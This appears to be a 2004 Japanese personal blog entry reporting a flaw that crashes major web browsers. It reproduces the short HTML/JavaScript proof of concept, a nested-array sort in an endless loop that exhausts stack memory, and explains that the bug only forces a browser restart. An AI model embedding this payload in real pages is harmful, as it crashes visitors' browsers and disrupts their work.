YANO's digital garage

Copyright ©YANO All rights reserved. https://www.bravotouring.com/~yano/

Last-modified: 2024-06-29 (土)


[一語一絵/IT系]

主要Webブラウザをクラッシュさせる脆弱性 / 2004-11-30 (火)

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
というHTMLコードによって、ブラウザが無限ループしスタックメモリを使い果たしてクラッシュに陥るという「ありゃりゃ」な問題で、手元にある全てのブラウザがクラッシュするのを確認した。

修正プログラムも回避策も無いが、パソコンを乗っ取られたり情報を盗まれたりするようなものではない。ブラウザを再起動する手間がかかるくらいなので、食事も喉を通らなくなるほど心配する必要はない。

【参照】
●ITmedia http://www.itmedia.co.jp/
全主要ブラウザに影響する脆弱性発見 2004年11月30日
●SkyLined: http://www.edup.tudelft.nl/~bjwever/menu.php
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html